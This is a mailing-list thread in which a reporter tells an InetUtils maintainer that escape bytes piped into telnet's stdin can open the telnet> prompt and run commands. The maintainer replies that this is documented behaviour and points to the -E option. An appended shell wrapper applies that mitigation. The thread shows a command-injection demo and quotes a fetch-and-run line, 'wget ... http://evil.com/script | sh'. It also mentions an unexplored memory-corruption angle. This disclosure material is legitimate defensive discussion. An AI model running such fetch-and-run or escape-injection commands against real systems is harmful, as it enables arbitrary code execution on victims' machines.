Hi Simon, I know this is a "feature", but connecting the stdin of telnet to any kind of controllable input, which will lead to command execution, is a dangerous default option.
I also have another vulnerability related to the stdin parser: it is a SIGSEGV. I'm studying whether I can control the movl to overwrite a function pointer in memory in order to get execution. But the attack vector is also stdin, so the attack vector is "rare".

Regards.

2011/10/3 Simon Josefsson <[email protected]>

> sha0 <[email protected]> writes:
>
> > Hello,
> >
> > Is it possible to inject an escape sequence via stdin to telnet, so that arbitrary
> > commands will be executed,
>
> Hi! Thanks for studying InetUtils for security problems. I'm not sure
> I follow your "attack" though.
>
> > for example:
> >
> >
> > # cat evil-file | telnet 127.0.0.1 80
> > Trying 127.0.0.1...
> > Connected to 127.0.0.1.
> > Escape character is '^]'.
> >
> > telnet> !id
> > uid=0(root) gid=0(root)
> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
> > Connection closed by foreign host.
> >
> >
> > I think it is very dangerous, although few admins use telnet for moving files
> > like this
>
> Yes it is dangerous, so don't do that. Use ftp to transfer files.
>
> > 3. DESCRIPTION
> > -------------------------
> > When telnet is used to transfer files to a remote tcp port, a very dangerous
> > vulnerability is present that allows remote arbitrary code execution.
>
> The attack seems to be based on tricking the local root user into doing
> something stupid. This is similar to asking the local root user to do
> 'wget -O - http://evil.com/script | sh'. There is no security bug in
> wget or sh just because that is possible.
>
> > 7. SOLUTION
> > -------------------------
> > The stdin parser must filter the 0x9d byte.
>
> The ^] escape sequence is a documented feature, so I don't think that is
> a solution.
>
> You can use the command line parameter -E to inhibit the escape
> character if you want. Quoting 'telnet --help':
>
> -E, --no-escape use no escape character
>
> /Simon
>
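As an added example that is not part of this thread and not InetUtils code, here is a shell wrapper that applies the mitigation Simon points to: it forces -E whenever telnet's stdin is not a terminal, and first counts escape-capable bytes in the spooled input so an admin can see whether a given file would ever reach the telnet> prompt. It assumes a telnet in PATH that accepts -E as the quoted --help line shows; the scan counts both 0x1d (ASCII ^]) and 0x9d, the byte named in the report.

```shell
#!/bin/sh
# Added example, not from the InetUtils thread. Assumes `telnet -E` works
# as quoted from 'telnet --help' in the discussion above.

# Count escape-capable bytes in a file: 0x1d (ASCII ^]) or 0x9d (the byte
# the report names). Prints the count as a plain number.
count_escape_bytes() {
    LC_ALL=C tr -d -c '\035\235' < "$1" | wc -c | tr -d ' '
}

# Build the telnet command line, one word per line.
# $1 is "tty" when stdin is a terminal, anything else for a file or pipe.
# Non-terminal stdin always gets -E so data bytes cannot open "telnet>".
build_telnet_cmd() {
    mode=$1; shift
    if [ "$mode" = tty ]; then
        printf '%s\n' telnet "$@"
    else
        printf '%s\n' telnet -E "$@"
    fi
}

# Wrapper: interactive use is passed through unchanged; piped or redirected
# input is spooled, scanned, and refused (exit 2) if it contains escape
# bytes, unless --allow-escape-bytes is given. Either way it runs with -E.
safe_telnet() {
    allow=0
    if [ "$1" = --allow-escape-bytes ]; then allow=1; shift; fi
    if [ -t 0 ]; then
        exec telnet "$@"
    fi
    tmp=$(mktemp) || return 1
    cat > "$tmp"
    n=$(count_escape_bytes "$tmp")
    if [ "$n" -gt 0 ] && [ "$allow" -eq 0 ]; then
        echo "safe_telnet: refusing: stdin contains $n escape byte(s)" >&2
        rm -f "$tmp"
        return 2
    fi
    telnet -E "$@" < "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}
```

Calling `safe_telnet 127.0.0.1 80 < some-file` is the drop-in replacement for the `cat file | telnet` pattern in the report.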
